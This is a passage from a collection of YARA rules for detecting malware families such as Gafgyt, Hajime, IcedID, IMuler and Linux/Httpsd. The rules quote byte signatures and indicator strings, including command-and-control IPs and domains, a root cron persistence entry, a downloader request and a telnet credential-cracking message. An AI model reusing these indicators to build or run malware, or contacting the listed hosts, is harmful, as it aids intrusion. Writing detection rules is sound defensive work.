    $op660 = { E0 01 43 00 C7 84 24 E4 }
    $op661 = { 83 C4 0C 5E 5B 5F C9 C3 55 8B EC 51 51 A1 D8 60 }
    $op662 = { FC 00 43 00 C7 84 24 A8 }
    $op663 = { EB 16 FF 71 08 0F BF CA 83 C0 4C 51 50 A1 D8 60 }
    $op664 = { 88 96 43 00 C7 84 24 A0 }
    $op665 = { CC E6 42 00 C7 84 24 88 }
    $op666 = { 83 C4 0C 5F 33 C0 5E 5D C3 8B 4C 24 04 0F BE 41 }
    $op667 = { B8 01 43 00 C7 84 24 D8 }
    $op668 = { 68 68 F2 43 00 FF 75 FC FF 91 50 03 00 00 8B 0D }
    $op669 = { 8B 43 3A 8B 4D FC 8D 04 88 03 C6 50 A1 D8 60 44 }
    $op670 = { EA 42 00 C7 84 24 3C 01 00 00 10 EA 42 00 C7 84 }
    $op671 = { 83 C4 20 85 FF 75 04 33 C0 EB 4B 8B 76 3A 8D 44 }
    $op672 = { 24 A4 42 00 C7 84 24 C4 }
    $op673 = { 83 C4 0C FF 75 88 FF 75 08 A1 D8 60 44 00 FF 90 }
    $op674 = { 7C 2A 44 00 C7 84 24 C0 }
    $op675 = { 8B 43 00 C7 84 24 54 0B 00 00 0C 8B 43 00 C7 84 }
    $op676 = { 50 A1 D8 60 44 00 57 68 1C B1 43 00 68 2C B1 43 }
    $op677 = { F8 23 44 00 C7 84 24 94 }
    $op678 = { 80 8D 45 F8 50 A1 D8 60 44 00 6A 00 FF 90 20 01 }
    $op679 = { 8B 46 3A 03 C3 50 A1 D8 60 44 00 FF 90 78 02 00 }
    $op680 = { FF 76 08 A1 D8 60 44 00 FF 90 1C 01 00 00 8B D8 }
    $op681 = { FF 45 FC 81 7D FC 10 27 00 00 0F 8F FB }
    $op682 = { 74 0A C7 05 04 61 44 00 06 }
    $op683 = { 7A 43 00 C7 84 24 5C 06 00 00 1C 7A 43 00 C7 84 }
    $op684 = { 94 00 43 00 C7 84 24 98 }
    $op685 = { 9C 43 00 C7 84 24 3C 02 00 00 0C 9C 43 00 C7 84 }
    $op686 = { A1 D8 60 44 00 6A 00 68 28 C8 43 00 FF 75 08 FF }
    $op687 = { 70 52 43 00 C7 84 24 C4 }
    $op688 = { D6 E9 40 00 C7 81 B8 01 00 00 76 D1 40 00 C7 81 }
    $op689 = { 59 8D 44 00 02 50 68 44 C7 43 00 6A 01 6A 00 8D }
    $op690 = { 59 8D 44 00 02 50 8B 44 24 34 57 68 40 47 44 00 }
    $op691 = { A1 D8 60 44 00 57 FF 75 08 FF 90 90 01 00 00 FF }
    $op692 = { 88 DD 42 00 C7 84 24 B4 }
    $op693 = { 50 A1 D8 60 44 00 56 68 00 50 43 00 56 53 FF 90 }
    $op694 = { 98 53 43 00 C7 84 24 EC }
    $op695 = { 8B 44 24 0C 83 C0 44 68 DC 68 43 00 50 A1 D8 60 }
    $op696 = { 50 68 00 00 10 80 8D 44 24 50 50 A1 D8 60 44 00 }
    $op697 = { 98 01 43 00 C7 84 24 D0 }
    $op698 = { 3C 01 43 00 C7 84 24 B8 }
    $op699 = { 9C 51 43 00 C7 84 24 A0 }
    $op700 = { 59 FF 75 E8 FF 75 08 A1 D8 60 44 00 FF 90 90 01 }
    $op701 = { E9 AA FE FF FF A1 D8 60 44 00 6A 00 6A FF FF 50 }
    $op702 = { FF 74 24 14 A1 D8 60 44 00 FF 75 08 FF 90 34 04 }
    $op703 = { BB D0 3F 00 00 3B F3 6A 01 0F 8E 9F }
    $op704 = { 2C DE 42 00 C7 84 24 E4 }
    $op705 = { 28 11 43 00 C7 84 24 A8 }
    $op706 = { 38 A3 42 00 C7 84 24 90 }
    $op707 = { 38 A4 42 00 C7 84 24 CC }
    $op708 = { 68 2C 43 44 00 50 A1 D8 60 44 00 53 FF 90 2C 03 }
    $op709 = { F8 DC 42 00 C7 84 24 94 }
    $op710 = { FF 05 00 A0 42 00 A2 C3 60 44 00 A1 D8 60 44 00 }
    $op711 = { 68 B0 44 43 00 FF 75 88 A1 D8 60 44 00 FF 90 20 }
    $op712 = { 50 FF 75 0C A1 D8 60 44 00 57 FF 90 94 }
    $op713 = { 24 2B 44 00 C7 84 24 D8 }
    $op714 = { 83 3D FC 60 44 00 00 75 0A C7 05 FC 60 44 00 6C }
    $op715 = { 68 A3 42 00 C7 84 24 98 }
    $op716 = { CC E7 42 00 C7 84 24 C4 }
    $op717 = { 83 C4 14 85 C0 0F 84 40 FE FF FF C7 46 10 04 }
    $op718 = { 83 C4 0C 8D 34 46 3B 5D 14 74 02 46 46 43 3B 5D }
    $op719 = { E0 A3 42 00 C7 84 24 AC }
    $op720 = { 8B 75 10 8B 36 3B F3 0F 8D 92 }
    $op721 = { E8 01 43 00 C7 84 24 E8 }
    $op722 = { 38 02 43 00 C7 84 24 FC }
    $op723 = { 0C 52 43 00 C7 84 24 B4 }
    $op724 = { 60 E7 42 00 C7 84 24 AC }
    $op725 = { D8 DC 42 00 C7 84 24 88 }
    $op726 = { 3C 24 44 00 C7 84 24 B4 }
    $op727 = { 6A 2F 8D 45 B8 50 FF 75 7C A1 D8 60 44 00 C7 45 }
    $op728 = { 66 83 78 0A 3A 0F 85 B6 }
    $op729 = { B0 53 43 00 C7 84 24 F0 }
    $op730 = { 68 C8 41 43 00 FF 75 B8 A1 D8 60 44 00 FF 90 20 }
    $op731 = { 44 12 43 00 C7 84 24 F8 }
    $op732 = { 78 24 44 00 C7 84 24 CC }
    $op733 = { 8D 85 00 FE FF FF 68 6C 69 43 00 68 FF }
    $op734 = { 7C 01 43 00 C7 84 24 C4 }
    $op735 = { A1 D8 60 44 00 56 53 FF 90 90 01 00 00 83 C4 1C }
    $op736 = { 65 FB 40 00 C7 81 14 02 00 00 51 62 41 00 C7 81 }
    $op737 = { FF 75 10 50 FF 75 08 A1 D8 60 44 00 FF 90 2C 03 }
    $op738 = { FF 75 F8 8D 43 10 50 FF 75 08 A1 D8 60 44 00 FF }
    $op739 = { 8B 55 14 8B 12 85 D2 0F 8C 1F 01 00 00 0F BF 70 }
    $op740 = { 58 02 43 00 C7 84 24 00 01 00 00 7C 02 43 00 C7 }
    $op741 = { 84 01 43 00 C7 84 24 C8 }
    $op742 = { 83 C4 0C 43 3B 5D 14 8D 74 46 02 7C D2 33 C0 66 }
    $op743 = { 50 A1 D8 60 44 00 FF 90 A4 02 00 00 83 C4 1C EB }
    $op744 = { 70 DD 42 00 C7 84 24 AC }
    $op745 = { 7C DD 42 00 C7 84 24 B0 }
    $op746 = { FF 74 24 44 89 44 24 58 8B 44 24 2C 83 C0 44 50 }
    $op747 = { 50 A1 D8 60 44 00 57 68 E4 A7 43 00 68 14 A9 43 }
    $op748 = { CC 2B 44 00 C7 84 24 EC }
    $op749 = { A4 11 43 00 C7 84 24 CC }
    $op750 = { 68 F0 5A 44 00 89 45 F0 57 8D 45 F0 50 A1 D8 60 }
    $op751 = { 1F 44 00 C7 84 24 90 03 00 00 10 1F 44 00 C7 84 }
    $op752 = { 38 29 44 00 C7 84 24 90 }
    $op753 = { DC 2B 44 00 C7 84 24 F0 }
    $op754 = { 9A 43 00 C7 84 24 A8 01 00 00 08 9A 43 00 C7 84 }
    $op755 = { 8B 44 24 20 83 C0 04 50 FF 75 08 A1 D8 60 44 00 }
    $op756 = { 59 5F 5E C9 C3 55 8B EC 83 EC 2C 6A 0B 8D 45 D4 }
    $op757 = { 59 8D 44 00 02 50 53 6A 01 6A 00 8D 45 EC 50 FF }
    $op758 = { E4 E8 42 00 C7 84 24 00 01 00 00 FC E8 42 00 C7 }
    $op759 = { 8B 75 10 8B 36 3B F2 0F 8D D5 }
    $op760 = { 8A 44 24 27 83 C4 14 5F 5E 5B 8B E5 5D C3 55 8B }
    $op761 = { 8A 44 24 27 83 C4 14 5F 5E 5B 8B E5 5D C3 55 8B }
    $op762 = { 08 E8 42 00 C7 84 24 D0 }
    $op763 = { 54 00 43 00 C7 84 24 88 }
    $op764 = { 8B 45 F4 01 45 F0 29 45 EC 83 C4 0C FF 45 FC 8B }
    $op765 = { EC E6 42 00 C7 84 24 90 }
    $op766 = { 59 A1 D8 60 44 00 56 53 FF 75 F8 FF 90 D4 03 00 }
    $op767 = { 59 A1 D8 60 44 00 53 68 08 B3 43 00 56 C7 45 C8 }
    $op768 = { 30 A4 42 00 C7 84 24 C8 }
    $op769 = { C4 24 44 00 C7 84 24 E4 }
    $op770 = { FF 45 FC 81 7D FC E8 03 00 00 0F 8F AC }
    $op771 = { C4 A3 42 00 C7 84 24 A8 }
    $op772 = { E5 6D 41 00 C7 81 88 02 00 00 4E 9E 41 00 C7 81 }
    $op773 = { 30 96 43 00 C7 84 24 84 }
    $op774 = { 0F 82 52 FF FF FF A1 D8 60 44 00 53 FF 75 08 FF }
  condition:
    (uint16(0) == 23117 and filesize < 921600 and (5 of ($s*)) and 1 of ($op*)) or (all of them)
}

rule Gafgyt_Botnet_generic : MALW {
  meta:
    description = "Gafgyt Trojan"
    author = "Joan Soriano / @joanbtl"
    date = "2017-05-01"
    version = "1.0"
    MD5 = "e3fac853203c3f1692af0101eaad87f1"
    SHA1 = "710781e62d49419a3a73624f4a914b2ad1684c6a"
  strings:
    $etcTZ = "/bin/busybox;echo -e 'gayfgt'"
    $s2 = "/proc/net/route"
    $s3 = "admin"
    $s4 = "root"
  condition:
    $etcTZ and $s2 and $s3 and $s4
}

rule Gafgyt_Botnet_oh : MALW {
  meta:
    description = "Gafgyt Trojan"
    author = "Joan Soriano / @joanbtl"
    date = "2017-05-025"
    version = "1.0"
    MD5 = "97f5edac312de349495cb4afd119d2a5"
    SHA1 = "916a51f2139f11e8be6247418dca6c41591f4557"
  strings:
    $s1 = "busyboxterrorist"
    $s2 = "BOGOMIPS"
    $s3 = "124.105.97.%d"
    $s4 = "fucknet"
  condition:
    $s1 and $s2 and $s3 and $s4
}

rule Gafgyt_Botnet_bash : MALW {
  meta:
    description = "Gafgyt Trojan"
    author = "Joan Soriano / @joanbtl"
    date = "2017-05-25"
    version = "1.0"
    MD5 = "c8d58acfe524a09d4df7ffbe4a43c429"
    SHA1 = "b41fefa8470f3b3657594af18d2ea4f6ac4d567f"
  strings:
    $s1 = "PONG!"
    $s2 = "GETLOCALIP"
    $s3 = "HTTPFLOOD"
    $s4 = "LUCKYLILDUDE"
  condition:
    $s1 and $s2 and $s3 and $s4
}

rule Gafgyt_Botnet_hoho : MALW {
  meta:
    description = "Gafgyt Trojan"
    author = "Joan Soriano / @joanbtl"
    date = "2017-05-25"
    version = "1.0"
    MD5 = "369c7c66224b343f624803d595aa1e09"
    SHA1 = "54519d2c124cb536ed0ddad5683440293d90934f"
  strings:
    $s1 = "PING"
    $s2 = "PRIVMSG"
    $s3 = "Remote IRC Bot"
    $s4 = "23.95.43.182"
  condition:
    $s1 and $s2 and $s3 and $s4
}

rule Gafgyt_Botnet_jackmy : MALW {
  meta:
    description = "Gafgyt Trojan"
    author = "Joan Soriano / @joanbtl"
    date = "2017-05-25"
    version = "1.0"
    MD5 = "419b8a10a3ac200e7e8a0c141b8abfba"
    SHA1 = "5433a5768c5d22dabc4d133c8a1d192d525939d5"
  strings:
    $s1 = "PING"
    $s2 = "PONG"
    $s3 = "jackmy"
    $s4 = "203.134.%d.%d"
  condition:
    $s1 and $s2 and $s3 and $s4
}

rule Gafgyt_Botnet_HIHI : MALW {
  meta:
    description = "Gafgyt Trojan"
    author = "Joan Soriano / @joanbtl"
    date = "2017-05-01"
    version = "1.0"
    MD5 = "cc99e8dd2067fd5702a4716164865c8a"
    SHA1 = "b9b316c1cc9f7a1bf8c70400861de08d95716e49"
  strings:
    $s1 = "PING"
    $s2 = "PONG"
    $s3 = "TELNET LOGIN CRACKED - %s:%s:%s"
    $s4 = "ADVANCEDBOT"
    $s5 = "46.166.185.92"
    $s6 = "LOLNOGTFO"
  condition:
    $s1 and $s2 and $s3 and $s4 and $s5 and $s6
}

rule genome {
  meta:
    author = "Brian Wallace @botnet_hunter"
    author_email = "bwall@ballastsecurity.net"
    date = "2014-09-07"
    description = "Identify Genome"
  strings:
    $s1 = "Attempting to create more than one keyboard::Monitor instance"
    $s2 = "{Right windows}"
    $s3 = "Access violation - no RTTI data!"
  condition:
    all of them
}

private rule GlassesCode : Glasses Family {
  meta:
    description = "Glasses code features"
    author = "Seth Hardy"
    last_modified = "2021-11-18"
    reference_file = "aaf262fde1738dbf0bb50213a9624cd6705ebcaeb06c5fcaf7e9f33695d3fc33"
    reference_url = "https://citizenlab.ca/2013/02/apt1s-glasses-watching-a-human-rights-organization/"
  strings:
    $ = { B8 AB AA AA AA F7 E1 D1 EA 8D 04 52 2B C8 }
    $ = { B8 56 55 55 55 F7 E9 8B 4C 24 1C 8B C2 C1 E8 1F 03 D0 49 3B CA }
  condition:
    any of them
}

rule GlassesStrings : Glasses Family {
  meta:
    description = "Strings used by Glasses"
    author = "Seth Hardy"
    last_modified = "2021-11-18"
    reference_file = "aaf262fde1738dbf0bb50213a9624cd6705ebcaeb06c5fcaf7e9f33695d3fc33"
    reference_url = "https://citizenlab.ca/2013/02/apt1s-glasses-watching-a-human-rights-organization/"
  strings:
    $ = "thequickbrownfxjmpsvalzydg"
    $ = "Mozilla/4.0 (compatible; Windows NT 5.1; MSIE 7.0; Trident/4.0; %s.%s)"
    $ = "\" target=\"NewRef\"></a>"
  condition:
    all of them
}

rule Glasses : Family {
  meta:
    description = "Glasses family"
    author = "Seth Hardy"
    last_modified = "2021-11-18"
    reference_file = "aaf262fde1738dbf0bb50213a9624cd6705ebcaeb06c5fcaf7e9f33695d3fc33"
    reference_url = "https://citizenlab.ca/2013/02/apt1s-glasses-watching-a-human-rights-organization/"
  condition:
    GlassesCode and GlassesStrings
}

rule GoziRule : Gozi Family {
  meta:
    description = "Win32.Gozi"
    author = "CCN-CERT"
    version = "1.0"
    ref = "https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos.html"
  strings:
    $ = { 63 00 6F 00 6F 00 6B 00 69 00 65 00 73 00 2E 00 73 00 71 00 6C 00 69 00 74 00 65 00 2D 00 6A 00 6F 00 75 00 72 00 6E 00 61 00 6C 00 00 00 4F 50 45 52 41 2E 45 58 45 00 }
  condition:
    all of them
}

rule Grozlex : Stealer {
  meta:
    author = "Kevin Falcoz"
    date = "20/08/2013"
    description = "Grozlex Stealer - Possible HCStealer"
  strings:
    $signature = { 4C 00 6F 00 67 00 73 00 20 00 61 00 74 00 74 00 61 00 63 00 68 00 65 00 64 00 20 00 62 00 79 00 20 00 69 00 43 00 6F 00 7A 00 65 00 6E }
  condition:
    $signature
}

rule Hajime_generic_ARCH : MALW {
  meta:
    description = "Hajime Botnet - generic arch"
    author = "Joan Soriano / @joanbtl"
    date = "2017-05-01"
    version = "1.0"
    MD5 = "77122e0e6fcf18df9572d80c4eedd88d"
    SHA1 = "108ee460d4c11ea373b7bba92086dd8023c0654f"
    ref1 = "https://www.symantec.com/connect/blogs/hajime-worm-battles-mirai-control-internet-things/"
    ref2 = "https://security.rapiditynetworks.com/publications/2016-10-16/hajime.pdf"
  strings:
    $userpass = "%d (!=0),user/pass auth will not work, ignored.\n"
    $etcTZ = "/etc/TZ"
    $Mvrs = ",M4.1.0,M10.5.0"
    $bld = "%u.%u.%u.%u.in-addr.arpa"
  condition:
    $userpass and $etcTZ and $Mvrs and $bld
}

rule Hajime_MIPS : MALW {
  meta:
    description = "Hajime Botnet - MIPS"
    author = "Joan Soriano / @joanbtl"
    date = "2017-05-01"
    version = "1.0"
    MD5 = "77122e0e6fcf18df9572d80c4eedd88d"
    SHA1 = "108ee460d4c11ea373b7bba92086dd8023c0654f"
    ref1 = "https://www.symantec.com/connect/blogs/hajime-worm-battles-mirai-control-internet-things/"
    ref2 = "https://security.rapiditynetworks.com/publications/2016-10-16/hajime.pdf"
  strings:
    $userpass = "%d (!=0),user/pass auth will not work, ignored.\n"
    $etcTZ = "/etc/TZ"
    $Mvrs = ",M4.1.0,M10.5.0"
    $bld = "%u.%u.%u.%u.in-addr.arpa"
  condition:
    $userpass and $etcTZ and $Mvrs and $bld and hash.sha1(0, filesize) == "108ee460d4c11ea373b7bba92086dd8023c0654f"
}

rule Hajime_ARM5 : MALW {
  meta:
    description = "Hajime Botnet - ARM5"
    author = "Joan Soriano / @joanbtl"
    date = "2017-05-01"
    version = "1.0"
    MD5 = "d8821a03b9dc484144285d9051e0b2d3"
    SHA1 = "89ec638b95b289dbce0535b4a2c5aad90c169d06"
    ref1 = "https://www.symantec.com/connect/blogs/hajime-worm-battles-mirai-control-internet-things/"
    ref2 = "https://security.rapiditynetworks.com/publications/2016-10-16/hajime.pdf"
  strings:
    $userpass = "%d (!=0),user/pass auth will not work, ignored.\n"
    $etcTZ = "/etc/TZ"
    $Mvrs = ",M4.1.0,M10.5.0"
    $bld = "%u.%u.%u.%u.in-addr.arpa"
  condition:
    $userpass and $etcTZ and $Mvrs and $bld and hash.sha1(0, filesize) == "89ec638b95b289dbce0535b4a2c5aad90c169d06"
}

rule Hajime_SH4 : MALW {
  meta:
    description = "Hajime Botnet - SH4"
    author = "Joan Soriano / @joanbtl"
    date = "2017-05-01"
    version = "1.0"
    MD5 = "6f39d7311091166a285fb0654b454761"
    SHA1 = "3ed95ead04e59a2833538541978b79a9a8cb5290"
    ref1 = "https://www.symantec.com/connect/blogs/hajime-worm-battles-mirai-control-internet-things/"
    ref2 = "https://security.rapiditynetworks.com/publications/2016-10-16/hajime.pdf"
  strings:
    $userpass = "%d (!=0),user/pass auth will not work, ignored.\n"
    $etcTZ = "/etc/TZ"
    $Mvrs = ",M4.1.0,M10.5.0"
    $bld = "%u.%u.%u.%u.in-addr.arpa"
  condition:
    $userpass and $etcTZ and $Mvrs and $bld and hash.sha1(0, filesize) == "3ed95ead04e59a2833538541978b79a9a8cb5290"
}

rule Hajime_DOWNLOADER : MALW {
  meta:
    description = "Hajime Botnet - Downloader"
    author = "Joan Soriano / @joanbtl"
    date = "2017-05-01"
    version = "1.0"
    MD5 = "f1cc4275d29b7eaa92a4cca015af227e"
    SHA1 = "e649e0d97cc23c8c4bbd78be430a49a4babbccd7"
    ref1 = "https://www.symantec.com/connect/blogs/hajime-worm-battles-mirai-control-internet-things/"
    ref2 = "https://security.rapiditynetworks.com/publications/2016-10-16/hajime.pdf"
  strings:
    $get = "GET /r/sr.arm5 HTTP/1.0"
    $nif = "NIF\n"
  condition:
    $get and $nif and filesize < 716800 and hash.sha1(0, filesize) == "e649e0d97cc23c8c4bbd78be430a49a4babbccd7"
}

rule Hsdfihdf : banking malware {
  meta:
    author = "Adam Ziaja <adam@adamziaja.com> http://adamziaja.com"
    date = "2014-04-06"
    description = "Polish banking malware"
    hash0 = "db1675c74a444fd35383d9a45631cada"
    hash1 = "f48ba39df38056449a3e9a1a7289f657"
    filetype = "exe"
  strings:
    $s0 = "ANSI_CHARSET"
    $s1 = "][Vee_d_["
    $s2 = "qfcD:6<"
    $s3 = "%-%/%1%3%5%7%9%;%"
    $s4 = "imhzxsc\\WWKD<.)w"
    $s5 = "Vzlarf\\]VOZVMskf"
    $s6 = "JKWFAp\\Z"
    $s7 = "<aLLwhg"
    $s8 = "bdLeftToRight"
    $s9 = "F/.pTC7"
    $s10 = "O><8,)-$ "
    $s11 = "mjeUB>D.'8)5\\\\vhe["
    $s12 = "JGiVRk[W]PL("
    $s13 = "zwWNNG:8"
    $s14 = "zv7,'$"
    $a0 = "#hsdfihdf"
    $a1 = "polska.irc.pl"
    $b0 = "firehim@o2.pl"
    $b1 = "firehim@go2.pl"
    $b2 = "firehim@tlen.pl"
    $c0 = "cyberpunks.pl"
    $c1 = "kaper.phrack.pl"
    $c2 = "serwer.uk.to"
    $c3 = "ns1.ipv4.hu"
    $c4 = "scorebot.koth.hu"
    $c5 = "esopoland.pl"
  condition:
    14 of ($s*) or all of ($a*) or 1 of ($b*) or 2 of ($c*)
}

private rule is__LinuxHttpsdStrings {
  meta:
    description = "Strings of ELF Linux/Httpsd (backdoor, downloader, remote command execution)"
    ref1 = "https://imgur.com/a/8mFGk"
    ref2 = "https://otx.alienvault.com/pulse/5a49115f93199b171b90a212"
    ref3 = "https://misppriv.circl.lu/events/view/9952"
    author = "unixfreaxjp"
    org = "MalwareMustDie"
    date = "2018-01-02"
    sha256 = "dd1266561fe7fcd54d1eb17efbbb6babaa9c1f44b36cef6e06052e22ce275ccd"
    sha256 = "1b3718698fae20b63fbe6ab32411a02b0b08625f95014e03301b49afaee9d559"
  strings:
    $st01 = "k.conectionapis.com" ascii wide nocase fullword
    $st02 = "key=%s&host_name=%s&cpu_count=%d&os_type=%s&core_count=%s" ascii wide nocase fullword
    $st03 = "id=%d&result=%s" ascii wide nocase fullword
    $st04 = "rtime" ascii wide nocase fullword
    $st05 = "down" ascii wide nocase fullword
    $st06 = "cmd" ascii wide nocase fullword
    $st07 = "0 */6 * * * root" ascii wide nocase fullword
    $st08 = "/etc/cron.d/httpsd" ascii wide nocase fullword
    $st09 = "cat /proc/cpuinfo |grep processor|wc -l" ascii wide nocase fullword
    $st10 = "k.conectionapis.com" ascii wide nocase fullword
    $st11 = "/api" ascii wide nocase fullword
    $st12 = "/tmp/.httpslog" ascii wide nocase fullword
    $st13 = "/bin/.httpsd" ascii wide nocase fullword
    $st14 = "/tmp/.httpsd" ascii wide nocase fullword
    $st15 = "/tmp/.httpspid" ascii wide nocase fullword
    $st16 = "/tmp/.httpskey" ascii wide nocase fullword
  condition:
    all of them
}

rule Linux_Httpsd_malware_ARM {
  meta:
    description = "Detects Linux/Httpsd ARMv5"
    date = "2017-12-31"
  strings:
    $hexsts01 = { F0 4F 2D E9 1E DB 4D E2 EC D0 4D E2 01 40 A0 E1 }
    $hexsts02 = { F0 45 2D E9 0B DB 4D E2 04 D0 4D E2 3C 01 9F E5 }
    $hexsts03 = { F0 45 2D E9 01 DB 4D E2 04 D0 4D E2 BC 01 9F E5 }
  condition:
    all of them and is__elf and is__LinuxHttpsdStrings and filesize < 204800
}

rule Linux_Httpsd_malware_i686 {
  meta:
    description = "Detects ELF Linux/Httpsd i686"
    date = "2018-01-02"
  strings:
    $hexsts01 = { 8D 4C 24 04 83 E4 F0 FF 71 FC 55 89 E5 57 56 53 }
    $hexsts02 = { 55 89 E5 57 56 53 81 EC 14 2C 00 00 68 7A 83 05 }
    $hexsts03 = { 55 89 E5 57 56 53 81 EC 10 04 00 00 68 00 04 00 }
  condition:
    all of them and is__elf and is__LinuxHttpsdStrings and filesize < 204800
}

rule IMulerCode : IMuler Family {
  meta:
    description = "IMuler code tricks"
    author = "Seth Hardy"
    last_modified = "2014-06-16"
  strings:
    $L4_tmpSpotlight = { C7 ?? 2F 74 6D 70 C7 ?? 04 2F 53 70 6F }
    $L4_TMPAAABBB = { C7 ?? ?? ?? ?? ?? 54 4D 50 41 C7 ?? ?? ?? ?? ?? 41 41 42 42 }
    $L4_FILEAGENTVer = { C7 ?? 46 49 4C 45 C7 ?? 04 41 47 45 4E }
    $L4_TMP0M34JDF8 = { C7 ?? ?? ?? ?? ?? 54 4D 50 30 C7 ?? ?? ?? ?? ?? 4D 33 34 4A }
    $L4_tmpmdworker = { C7 ?? 2F 74 6D 70 C7 ?? 04 2F 2E 6D 64 }
  condition:
    any of ($L4*)
}

rule IMulerStrings : IMuler Family {
  meta:
    description = "IMuler Identifying Strings"
    author = "Seth Hardy"
    last_modified = "2014-06-16"
  strings:
    $ = "/cgi-mac/"
    $ = "xnocz1"
    $ = "checkvir.plist"
    $ = "/Users/apple/Documents/mac back"
    $ = "iMuler2"
    $ = "/Users/imac/Desktop/macback/"
    $ = "xntaskz.gz"
    $ = "2wmsetstatus.cgi"
    $ = "launch-0rp.dat"
    $ = "2wmupload.cgi"
    $ = "xntmpz"
    $ = "2wmrecvdata.cgi"
    $ = "xnorz6"
    $ = "2wmdelfile.cgi"
    $ = "/LanchAgents/checkvir"
    $ = "0PERA:%s"
    $ = "/tmp/Spotlight"
    $ = "/tmp/launch-ICS000"
  condition:
    any of them
}

rule IMuler : Family {
  meta:
    description = "IMuler"
    author = "Seth Hardy"
    last_modified = "2014-06-16"
  condition:
    IMulerCode or IMulerStrings
}

rule IceID_Bank_trojan {
  meta:
    description = "Detects IcedID..adjusted several times"
    author = "unixfreaxjp"
    org = "MalwareMustDie"
    date = "2018-01-14"
  strings:
    $header = { 4D 5A }
    $magic1 = { E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 6A ?? 68 ?? ?? }
    $st01 = "CCmdTarget" ascii wide nocase fullword
    $st02 = "CUserException" ascii wide nocase fullword
    $st03 = "FileType" ascii wide nocase fullword
    $st04 = "FlsGetValue" ascii wide nocase fullword
    $st05 = "AVCShellWrapper@@" ascii wide nocase fullword
    $st06 = "AVCCmdTarget@@" ascii wide nocase fullword
    $st07 = "AUCThreadData@@" ascii wide nocase fullword
    $st08 = "AVCUserException@@" ascii wide nocase fullword
  condition:
    $header at 0 and all of ($magic*) and 6 of ($st0*) and pe.sections[0].name contains ".text" and pe.sections[1].name contains ".rdata" and pe.sections[2].name contains ".data" and pe.sections[3].name contains ".rsrc" and pe.characteristics & pe.EXECUTABLE_IMAGE and pe.characteristics & pe.RELOCS_STRIPPED
}

rule iexpl0reCode : iexpl0ree Family {
  meta:
    description = "iexpl0re code features"
    author = "Seth Hardy"
    last_modified = "2014-07-21"
  strings:
    $ = { 47 83 FF 64 0F 8C 6D FF FF FF 33 C0 5F 5E 5B C9 C3 }
    $ = { 80 74 0D A4 44 41 3B C8 7C F6 68 04 01 00 00 }
    $ = { 8A C1 B2 07 F6 EA 30 04 31 41 3B 4D 10 7C F1 }
    $ = { 47 83 FF 64 0F 8C 79 FF FF FF 33 C0 5F 5E 5B C9 C3 }
    $ = { 68 88 00 00 00 68 90 06 00 00 68 ?? ?? ?? ?? 89 3? E8 }
    $ = { BB 88 00 00 00 53 68 90 06 00 00 68 ?? ?? ?? ?? 89 3? E8 }
  condition:
    any of them
}

rule iexpl0reStrings : iexpl0re Family {
  meta:
    description = "Strings used by iexpl0re"
    author = "Seth Hardy"
    last_modified = "2014-07-21"
  strings:
    $ = "%USERPROFILE%\\IEXPL0RE.EXE"
    $ = "\"<770j (("
    $ = "\\Users\\%s\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\IEXPL0RE.LNK"
    $ = "\\Documents and Settings\\%s\\Application Data\\Microsoft\\Internet Explorer\\IEXPL0RE.EXE"
    $ = "LoaderV5.dll"
    $ = "POST /index%0.9d.asp HTTP/1.1"
    $ = "GET /search?n=%0.9d&"
    $ = "DUDE_AM_I_SHARP-3.14159265358979x6.626176"
    $ = "WHO_A_R_E_YOU?2.99792458x1.25663706143592"
    $ = "BASTARD_&&_BITCHES_%0.8x"
    $ = "c:\\bbb\\eee.txt"
  condition:
    any of them
}

rule iexpl0re : Family {
  meta:
    description = "iexpl0re family"
    author = "Seth Hardy"
    last_modified = "2014-07-21"
  condition:
    iexpl0reCode or iexpl0reStrings
}

rule Insta11Code : Insta11 Family {
  meta:
    description = "Insta11 code features"
    author = "Seth Hardy"
    last_modified = "2014-06-23"
  strings:
    $jumpandpush = { E9 00 00 00 00 68 23 04 00 00 }
  condition:
    any of them
}

rule Insta11Strings : Insta11 Family {
  meta:
    description = "Insta11 Identifying Strings"
    author = "Seth Hardy"
    last_modified = "2014-06-23"
  strings:
    $ = "XTALKER7"
    $ = "Insta11 Microsoft" ascii wide
    $ = "wudMessage"
    $ = "ECD4FC4D-521C-11D0-B792-00A0C90312E1"
    $ = "B12AE898-D056-4378-A844-6D393FE37956"
  condition:
    any of them
}

rule Insta11 : Family {
  meta:
    description = "Insta11"
    author = "Seth Hardy"
    last_modified = "2014-06-23"
  condition:
    Insta11Code or Insta11Strings
}

rule Intel_Virtualization_Wizard_exe {
  meta:
    author = "cabrel@zerklabs.com"
    description = "Dynamic DLL abuse executable"
    file_1_seen = "2013-05-21"
    file_1_sha256 = "7787757ae851f4a162f46f794be1532ab78e1928185212bdab83b3106f28c708"
  strings:
    $a = { 4C 6F 61 64 53 54 52 49 4E 47 }
    $b = { 49 6E 69 74 69 61 6C 69 7A 65 4B 65 79 48 6F 6F 6B }
    $c = { 46 69 6E 64 52 65 73 6F 75 72 63 65 73 }
    $d = { 4C 6F 61 64 53 54 52 49 4E 47 46 72 6F 6D 48 4B 43 55 }
    $e = { 68 63 63 75 74 69 6C 73 2E 44 4C 4C }
  condition:
    all of them
}

rule Intel_Virtualization_Wizard_dll {
  meta:
    author = "cabrel@zerklabs.com"
    description = "Dynamic DLL (Malicious)"
    file_1_seen = "2013-05-21"
    file_1_sha256 = "485ae043b6a5758789f1d33766a26d8b45b9fde09cde0512aa32d4bd1ee04f28"
  strings:
    $a = { 48 3A 5C 46 61 73 74 5C 50 6C 75 67 28 68 6B 63 6D 64 29 5C }
    $b = { 64 6C 6C 5C 52 65 6C 65 61 73 65 5C 48 69 6A 61 63 6B 44 6C 6C 2E 70 64 62 }
  condition:
    ($a and $b) and Intel_Virtualization_Wizard_exe
}

rule IotReaper : MALW {
  meta:
    description = "Linux.IotReaper"
    author = "Joan Soriano / @w0lfvan"
    date = "2017-10-30"
    version = "1.0"
    MD5 = "95b448bdf6b6c97a33e1d1dbe41678eb"
    SHA256 = "b463ca6c3ec7fa19cd318afdd2fa2365fa9e947771c21c4bd6a3bc2120ba7f28"
  strings:
    $a = "weruuoqweiur.com"
    $b = "rm -f /tmp/ftpupload.sh \n"
    $c = "%02x-%02x-%02x-%02x-%02x-%02x"
  condition:
    all of them
}

rule Backdoor_Jolob {
  meta:
    maltype = "Backdoor.Jolob"
    ref = "https://github.com/reed1713"
    reference = "http://www.symantec.com/connect/blogs/new-flash-zero-day-linked-yet-more-watering-hole-attacks"
